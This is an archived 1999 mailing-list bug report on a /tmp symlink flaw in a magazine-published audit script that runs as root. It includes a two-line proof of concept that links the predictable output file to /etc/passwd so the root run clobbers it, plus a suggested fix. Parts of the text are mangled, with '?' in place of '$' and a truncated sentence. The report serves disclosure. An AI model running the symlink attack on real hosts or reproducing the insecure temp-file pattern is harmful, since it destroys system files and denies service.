January SysAdmin EY script DoS bug.

From: Jan B. Koum (jkbat_private)
Date: Mon Jan 04 1999 - 02:33:46 PST

  • Next message: kay: "Re: PATH variable in zip-slackware 2.0.35"

    /* Warning! Lame bug report ahead. */
    /* This is nothing against EY. They are a good company. This
    is against people who claim to be security experts and can't
    write a secure script. */
            Lets make it short. SysAdmin (www.samag.com - btw, their
            DNS is brocken. Isn't it ironic that they can't get their
            own systems running, yet they teach others how) magazine
            published a script in Jan 1999 issue which, after you
            run it as root, tells you stuff about your system. Here
            are some parts of this script:
    set HOSTNAME=`hostname`
    set basedir=/tmp/eyscan
    set OUTPUT=?{basedir}/ey-?{HOSTNAME}.out
            After that, output like 'ls -l /etc/passwd' is sent to
            So you know that your admin runs lame scripts as root
            and what do you do? Hmm.. gee..
    % mkdir /tmp/eyscan
    % ln -s /etc/passwd /tmp/eyscan/ey-`hostname`.out
            After an admin runs the script - he is toasted. A points
            to this story kids:
            o  set basedir=/root or /var/run ..
    -- Yan

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